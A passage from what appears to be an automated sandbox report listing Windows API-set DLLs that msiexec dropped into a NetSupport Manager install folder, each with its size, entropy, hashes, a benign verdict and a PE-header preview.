                                                                                                                    SSDEEP:192:sZWVghW/Y7l9YOCAs/nGfe4pBjSfXVJ4WNArXVWQ4mWGqnajxcRGlPMRd54kft:4W2hWQ7QA0GftpBjcqRll7PedGkft
                                                                                                                    MD5:3B3BD0AD4FEA16AB58FCAEAE4629879C
                                                                                                                    SHA1:EB175F53640FB8AC4028A7657BBF48823A535677
                                                                                                                    SHA-256:DCB9CF7E31D6772434C683353A1514F10D87D39FEAA9B3EDF3FA983B2988294C
                                                                                                                    SHA-512:F206E7F56A218A1725F212B20416210C228E60D0D3C44F9A598C93ACB10BF8A3C961B4C4D104AE0F166598BE5C5102A1FF77A39D2B70743E784F69C82FD4C730
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......S....@.......................................... ...................<..............8............................................................................text... ........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-debug-l1-1-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18624
                                                                                                                    Entropy (8bit):6.982441576564087
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:NvW2hW+77QA0GftpBjuYvd0WrlI663Upe:NR9yi866kQ
                                                                                                                    MD5:584766DF684B2AD2A3A5B05A5B457FAC
                                                                                                                    SHA1:C207B7AEDB8D978C8320A1454331519A8365F20D
                                                                                                                    SHA-256:B15964D49A2C5219E0923137AA9028611BE81FDBDCBB0D43BB3AAA23114E401F
                                                                                                                    SHA-512:3BC7D49F997E489466858A21DAA22B397ADB8E736D7E064542ED5F73CD87B52CBD412CDEC2B4B892F9231C2562E24C8DEBAB73054E878405F2B2A022E86D26B8
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......!h....@.......................................... ...................<..............8............................................................................text...+........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-errorhandling-l1-1-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18624
                                                                                                                    Entropy (8bit):7.00674396465633
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:+F87mxD3XWVghW/IvSx9YOCAs/nGfe4pBjSf/qoWNArXVWQ4mWBqnaj9RlS6Vab:h70W2hWQSUA0GftpBjoqUOlBRAkO
                                                                                                                    MD5:906CB0C8ABA8342D552B0F37DDFD475F
                                                                                                                    SHA1:A3CD528B9C212FEA97495A557A91D638B1608418
                                                                                                                    SHA-256:582E87ADE6DAC258844154B068C291FF8D8F6D7AB6EE029FCD3CF1391874C74B
                                                                                                                    SHA-512:27B33658A30010E0C6A09F5B1359A9E39871B7851D0CFB43F5E2063FB77DAFB34DF9724FCE82FC7826463104FEE0820AE4E996A76DD3912490689686EA05844B
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-1-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):22208
                                                                                                                    Entropy (8bit):6.906399541614446
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:3CYPvVX8rFTsdWVghW/VvSx9YOCAs/nGfe4pBjSfZCLWNArXVWQ4mWbmqnaj9Rlg:1PvVXfW2hW9SUA0GftpBj8yBlBRAkad
                                                                                                                    MD5:779A8B14C22E463EA535CBCA9EA84D49
                                                                                                                    SHA1:4620531D5291878C10D6E3974F240B98BC7FB4B9
                                                                                                                    SHA-256:FC0551DE11B310DFD8F3FC924F309D5E754B547FFC475CF6C3D007BB5366F148
                                                                                                                    SHA-512:08882528DF66FC582A890AD64C7F96E8F9DE56D4871A4D9B6B32E1C3FFB0C29B425F4CC893B2575F6697FFAFBB56BA84D43D602483B0470488DF823D445B84E4
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!.........................0...............................@.......6....@..........................................0...................<..............8............................................................................text............................... ..`.rsrc........0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l1-2-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18624
                                                                                                                    Entropy (8bit):6.98650705248822
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:7WVghWu7vSx9YOCAs/nGfe4pBjSby+ggmGWNArXVWQ42WHmMqnaj9RlS6VSyS:7W2hWmSUA0GftpBj+1bMlBRAkS3
                                                                                                                    MD5:F6D1216E974FB76585FD350EBDC30648
                                                                                                                    SHA1:F8F73AA038E49D9FCF3BD05A30DC2E8CBBE54A7C
                                                                                                                    SHA-256:348B70E57AE0329AC40AC3D866B8E896B0B8FEF7E8809A09566F33AF55D33271
                                                                                                                    SHA-512:756EE21BA895179A5B6836B75AEEFB75389B0FE4AE2AAFF9ED84F33075094663117133C810AB2E697EC04EAFFD54FF03EFA3B9344E467A847ACEA9F732935843
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......W5....@.............................L............ ...................<..............8............................................................................text...\........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-file-l2-1-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18624
                                                                                                                    Entropy (8bit):7.046229749504995
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:WUWVghW/zvSx9YOCAs/nGfe4pBjSfEtcsWNArXVWQ4mWV9QqnajxcRGlPMRd54xS:WUW2hW7SUA0GftpBjBj3ll7PedGxC/
                                                                                                                    MD5:BFB08FB09E8D68673F2F0213C59E2B97
                                                                                                                    SHA1:E1E5FF4E7DD1C902AFBE195D3E9FD2A7D4A539F2
                                                                                                                    SHA-256:6D5881719E9599BF10A4193C8E2DED2A38C10DE0BA8904F48C67F2DA6E84ED3E
                                                                                                                    SHA-512:E4F33306F3D06EA5C8E539EBDB6926D5F818234F481FF4605A9D5698AE8F2AFDF79F194ACD0E55AC963383B78BB4C9311EE97F3A188E12FBF2EE13B35D409900
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-handle-l1-1-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18624
                                                                                                                    Entropy (8bit):6.993015464813673
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:6YOWVghW/KgbXH9YOCAs/nGfe4pBjSfSAWNArXVWQ4mW/M2qnaj9RlS6VRob:EW2hWSgbCA0GftpBj8qRlBRAka
                                                                                                                    MD5:FC68978ABB44E572DFE637B7DD3D615F
                                                                                                                    SHA1:47D0F1BD5195CE10C5EC06BDB92E85DDA21CDAB3
                                                                                                                    SHA-256:DF6BED7BCCCAF7298133DF99E497FA70DA761BE99C2A5B2742CFC835BF62D356
                                                                                                                    SHA-512:7EB601D7482DDDC251898D7EFBDFE003BAB460AF13B3CB12F1D79FDF9D9D26FC9048FD8CA9969B68BBE5547FDCD16F59D980527A5B73B02DA145419834234873
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@............................._............ ...................<..............8............................................................................text...o........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-heap-l1-1-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):19136
                                                                                                                    Entropy (8bit):6.95985126360952
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:8l6W2hWJ7QA0GftpBj8VbJOAlXBtFwA+S:p+yi2VbJy4
                                                                                                                    MD5:1CD8672D8C08B39560A9D5518836493E
                                                                                                                    SHA1:C7CE2330265D07D88AD15F80DD88473F3DAAFCD0
                                                                                                                    SHA-256:4A5F33A0837A9D9F22D49EE6D062BAE671A4C5C5522DB6FFE03C1AA2C0BD008E
                                                                                                                    SHA-512:6BCE6EF09746C10E3B3F136BB2CE67002F27FF70C3FCBA48E7F1C3769000A62649A41FD82ACBE2A819B8ECE96D8E9399B15104CA2B40F65B51A0C84FC2A7901C
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-interlocked-l1-1-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):19136
                                                                                                                    Entropy (8bit):6.9718846004654225
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:8vlYsFeW2hWu7QA0GftpBjECp4DlXBtFwCf:8izyiChyG
                                                                                                                    MD5:B8BB783DEE4EA95576882625C365E616
                                                                                                                    SHA1:E9AF4B17FC082B5D717BFA013D46DA4BDFFB2CD3
                                                                                                                    SHA-256:21BD55B9D42A5FAA5FA3C5DD9FAD1665DF3C33557CC4F7A58248A88B69D372B8
                                                                                                                    SHA-512:B756468DCF7254FD31D3650F794B837724A82207001B521105BE05DF4CF187785897BE8377083C53A92C0DC5AEE2CDAF8B9538FD6944E0AC4BE5D286836037A1
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......`....@.......................................... ...................<..............8............................................................................text...$........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-libraryloader-l1-1-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):19136
                                                                                                                    Entropy (8bit):7.018574692016083
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:CbvuBL3BuW2hWO7QA0GftpBjvEcDflBRAkgD:7BL3BGfyidRA1
                                                                                                                    MD5:44CA070DC5C09FF8588CF6CDCB64E7A2
                                                                                                                    SHA1:63D1DA68CD984532217BEACC21B868B46EC5D910
                                                                                                                    SHA-256:EDEB5B3003DB4EE3767FA012E812323FADEF67663C1B45FED3FCA96CAD5AECC8
                                                                                                                    SHA-512:C3A214550993A56907AA35091112F9F89E0A74375A7C268133A7C06D88E5DE4F9C87F7E0BE5007F00081A772DF724590D38966ED465F92217D3EF2F45A29C237
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-localization-l1-2-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):21184
                                                                                                                    Entropy (8bit):6.98505637818331
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:9OMw3zdp3bwjGjue9/0jCRrndbVW2hWKgbCA0GftpBjbQywPAOll7PedGGZ:9OMwBprwjGjue9/0jCRrndbzM8iFFGkt
                                                                                                                    MD5:3B9D034CA8A0345BC8F248927A86BF22
                                                                                                                    SHA1:95FAF5007DAF8BA712A5D17F865F0E7938DA662B
                                                                                                                    SHA-256:A7AC7ECE5E626C0B4E32C13299E9A44C8C380C8981CE4965CBE4C83759D2F52D
                                                                                                                    SHA-512:04F0830878E0166FFD1220536592D0D7EC8AACD3F04340A8D91DF24D728F34FBBD559432E5C35F256D231AFE0AE926139D7503107CEA09BFD720AD65E19D1CDC
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-memory-l1-1-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):19136
                                                                                                                    Entropy (8bit):6.986049300390525
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:CYaBWVghW/B7l9YOCAs/nGfe4pBjSfaMjWNArXVWQ4mW6qnajMHxxBNT0662ONLD:IBW2hWZ7QA0GftpBjj21lI663Un
                                                                                                                    MD5:FC13F11A2458879B23C87B29C2BAD934
                                                                                                                    SHA1:68B15CC21F5541DC2226E9E967E08AF81D04A537
                                                                                                                    SHA-256:624841916513409C3CFCF45589EB96548C77B829E5D56A5783249D3AB7DC8998
                                                                                                                    SHA-512:801A23485E42CC224E508212E7114E89747543A20964CF666EE801FCC2FEA97888FAA1AF8DA2AF807C50187969A08C6FCE2A021836811786EF72F4C2BDBDE33C
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.............................l............ ...................<..............8............................................................................text...|........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-namedpipe-l1-1-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18624
                                                                                                                    Entropy (8bit):7.04628745407397
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:bhkd6WVghW/vt7l9YOCAs/nGfe4pBjSfWP18gWNArXVWQ4mW0tXqnajL1dHx3tKU:aYW2hWt7QA0GftpBj7PS8rxlXBtFwVoF
                                                                                                                    MD5:07954AF744363F9807355E4E9408DF45
                                                                                                                    SHA1:B37D06B39EB7186B55CEAE25427B7AB95E46E32F
                                                                                                                    SHA-256:4B20AAF0E3B7566B797652F8D84B749AB23F7D1557DBA882C0590FE1BE98CED6
                                                                                                                    SHA-512:B7A7C16EF8BE62D9F562DCECF01B2AD1C066DE92AA4CA7A8C7BB93A80B1BC781F8A6A47F51A252E40337BD8D7778CACFEE7488A5FAD15F11D24C90572AD0E4C6
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processenvironment-l1-1-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):19648
                                                                                                                    Entropy (8bit):6.961454559139268
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:GkZjWVghW/WgbXH9YOCAs/nGfe4pBjSfr4i6wWNArXVWQ4mWQVUqnajMHxxBNT0u:fjW2hWegbCA0GftpBjc4aolI663Ub2
                                                                                                                    MD5:39556E904FA2405ABAF27231DA8EF9E5
                                                                                                                    SHA1:89DB01B04DFDBE5C0F5E856050611A6A72F1AFD0
                                                                                                                    SHA-256:5F476627A904B182D9B3F142594DEFA267DB3CE8206BAC24AF063A29635B3A8B
                                                                                                                    SHA-512:558C0D0DD0CE24C7DCDEBAE64578E09ACC36A86B6F121266A147394DD9E8F8B2B81726B9CCC24ED07755950CD13C1D34CAB137E995D0BE25EBF52699D0FBB6B6
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......B.....@......................... ...G............ ...................<..............8............................................................................text...g........................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):20672
                                                                                                                    Entropy (8bit):6.988142648004873
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:0Ok1JzNcKSIxW2hWFSUA0GftpBjluF3sBlvQyURz8o:0pcKSCUi++rvU2o
                                                                                                                    MD5:39047E168FFBDD19185504633D6ECA29
                                                                                                                    SHA1:FE3423689EFEDADA19C7DEC3D5DD077A057BF379
                                                                                                                    SHA-256:611B3E36AD3E0045AB4170A5D4E2D05FD2A26DDE2F7B09EA51F4264E263A544B
                                                                                                                    SHA-512:8B7D38726E302CDCF5A296E50CCC969B2B122432B93E2B5D1D1F4C1B6C2B3A9B64AF79BB65A7A9EAC31F563AE60934458F9316DD5CBB071FB0A3AD180FAC6103
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0......~.....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-processthreads-l1-1-1.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):19136
                                                                                                                    Entropy (8bit):7.000917619737006
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:192:QgxDfIeJWVghW/c7l9YOCAs/nGfe4pBjSfxyWNArXVWQ4mWgBHqnaj9RlS6V6Qg:JDfIeJW2hWk7QA0GftpBjxdBHlBRAky
                                                                                                                    MD5:C2EAD5FCCE95A04D31810768A3D44D57
                                                                                                                    SHA1:96E791B4D217B3612B0263E8DF2F00009D5AF8D8
                                                                                                                    SHA-256:42A9A3D8A4A7C82CB6EC42C62D3A522DAA95BEB01ECB776AAC2BFD4AA1E58D62
                                                                                                                    SHA-512:C90048481D8F0A5EDA2EB6E7703B5A064F481BB7D8C78970408B374CB82E89FEBC2E36633F1F3E28323FB633D6A95AA1050A626CB0CB5EC62E9010491AAE91F4
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-profile-l1-1-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18112
                                                                                                                    Entropy (8bit):7.0782836442636174
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:MZeW2hWngbCA0GftpBjPEGVlvQyURz87X:3n8ixEQvU2L
                                                                                                                    MD5:7697F94ED76B22D83D677B999EDFC2E1
                                                                                                                    SHA1:42AFB5B8E76B8B77D845156B7124CC3E0C613F91
                                                                                                                    SHA-256:50FD585270FA79FD056EC04B6991D0E65CCA28C1116834A59D5591F8D8C2C214
                                                                                                                    SHA-512:1EF120BAA532692D22F8939D9F149035E38DA6B65B889BA6CCB7858596718D569B0B9B35AD3609DE9DAF229553254966BF3D5A6ABC4AF1FF56732CE8560B31C8
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-rtlsupport-l1-1-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18112
                                                                                                                    Entropy (8bit):7.072469017642331
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:mG1W2hWhSUA0GftpBjy6oNxll7PedGitM/:mGTgio6CJkGcG
                                                                                                                    MD5:FDF0B4BF0214585E18EE2F6978F985B0
                                                                                                                    SHA1:0FE247F8CCA0C04729135EE612FBFCED92D59D9D
                                                                                                                    SHA-256:CF42C1215695579ADE1842246EC43DA9A9B28E8107957C0C340CE3BA9F689584
                                                                                                                    SHA-512:D0A249C230520538E8C2759CC0A41444C543DABD6347C8A8231C587EBBA28905AD2DF5E5D6437881C7A02F6DE6212A719ACCA2F6D30F63F8D7A21A26921A1807
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0............@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-string-l1-1-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):18624
                                                                                                                    Entropy (8bit):7.021897050678374
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:5yMvJW2hW2gbCA0GftpBjMv3ulvQyURz8n:5yMvn88ikEvU2n
                                                                                                                    MD5:687533A89B43510CCE4D8B2ECB261AA0
                                                                                                                    SHA1:4004BA63880A92042C106FF6A549C6F5F69CE05D
                                                                                                                    SHA-256:E7272FF3B00508732896BF96F8DAB5AD32FE4531746AB1C228C315F1B4D48156
                                                                                                                    SHA-512:6A61DD13939BF61342278EFFA07D2654219032F9523D3D552275BD60BD3B125DAD13737924D33F6619C5A7CCACE008B37C3330451411D3BD09E1D2B5064F9AAC
                                                                                                                    Malicious:false
                                                                                                                    Antivirus:
                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......m2..)S..)S..)S....].(S....A.+S....^.(S....C.(S..Rich)S..........................PE..L....:.U...........!......................... ...............................0.......A....@.......................................... ...................<..............8............................................................................text............................... ..`.rsrc........ ......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Program Files (x86)\NetSupport\NetSupport Manager\api-ms-win-core-synch-l1-1-0.dll

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):20672
                                                                                                                    Entropy (8bit):6.936138213943514
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:384:wdv3V0dfpkXc0vVafW2hWqSUA0GftpBjjQjclvQyURz82u6:wdv3VqpkXc0vVaBziRvU22u6
                                                                                                                    MD5:88C4CA509C947509E123F22E5F077639
                                                                                                                    SHA1:AE837C556FF23B9E166288A11E409D21BDDDA4ED
                                                                                                                    SHA-256:0787FD3D9606B8614F9073C5F04CC6CB153BBF2992297CEBB8C537C066A78C9F
